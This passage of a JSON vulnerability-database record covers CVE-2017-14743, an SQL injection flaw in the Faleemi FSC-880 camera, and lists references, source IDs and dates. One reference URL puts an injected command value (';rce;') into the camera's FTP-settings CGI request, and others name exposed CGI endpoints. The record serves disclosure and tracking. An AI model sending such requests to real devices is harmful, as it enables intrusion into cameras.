            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#base64binary\"\u003efd"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr"
          },
          {
            "trust": 0.1,
            "url": "https://iotsploit.co/"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2003/05/soap-envelope\""
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2005/08/addressing\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.onvif.org/ver10/device/wsdl\"/\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01t00:03:58"
          },
          {
            "trust": 0.1,
            "url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus"
          },
          {
            "trust": 0.1,
            "url": "http://ip/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;rce;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname="
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-10-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "date": "2017-09-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "date": "2017-10-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "date": "2017-09-29T17:58:30",
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "date": "2017-09-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "date": "2017-09-26T06:29:00.187000",
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-10-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "date": "2017-10-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "date": "2017-10-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "date": "2017-09-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Faleemi FSC-880 SQL Injection Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          }
        ],
        "trust": 0.6
      }
    }